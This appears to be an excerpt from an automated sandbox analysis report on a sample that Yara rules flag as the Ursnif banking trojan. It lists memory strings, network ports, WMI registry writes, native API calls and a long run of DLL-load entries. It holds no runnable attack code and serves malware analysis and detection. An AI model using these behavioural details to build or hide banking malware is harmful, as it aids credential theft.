Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/diese-frau-wird-untersch%c3%a4tzt/ar-BB1be1om?ocid=hplocalnews
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/dieser-weisse-spatz-lebt-wohl-weniger-lang-als-seine-artgenosse
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ein-markantes-warenhaus-beim-z%c3%bcrcher-bellevue-erh%c3%a4lt-
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/eingehen-ins-grosse-nichts/ar-BB1bg2sr?ocid=hplocalnews
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/f%c3%bcr-immer-fr%c3%b6hlich-pessimistisch/ar-BB1bcZ3l?ocid=hpl
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/gesundheitsdirektorin-natalie-rickli-zu-den-problemen-am-z%c3%b
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/schluss-mit-starkultur/ar-BB1bfTOK?ocid=hplocalnews
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sind-die-badis-in-z%c3%bcrich-bald-gratis-f%c3%bcr-alle/ar-BB1b
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.385630027.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.601348245.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385676545.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385708605.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385696789.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385602285.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385720393.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385552815.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385580205.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1872, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.600478663.0000000000FCB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.385630027.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.601348245.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385676545.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385708605.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385696789.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385602285.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385720393.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385552815.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.385580205.0000000004BD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1872, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00511E57 GetProcAddress,NtCreateSection,wvsprintfA,memset,	1_2_00511E57
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_005111EA NtMapViewOfSection,	1_2_005111EA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_005123F5 NtQueryVirtualMemory,	1_2_005123F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00D96066 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00D96066
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00D9B10D NtQueryVirtualMemory,	1_2_00D9B10D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F0066 NtAllocateVirtualMemory,	1_2_004F0066
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F029D NtProtectVirtualMemory,	1_2_004F029D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004F009C NtAllocateVirtualMemory,	1_2_004F009C

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_005121D4	1_2_005121D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00D9AEEC	1_2_00D9AEEC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00D915CD	1_2_00D915CD

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
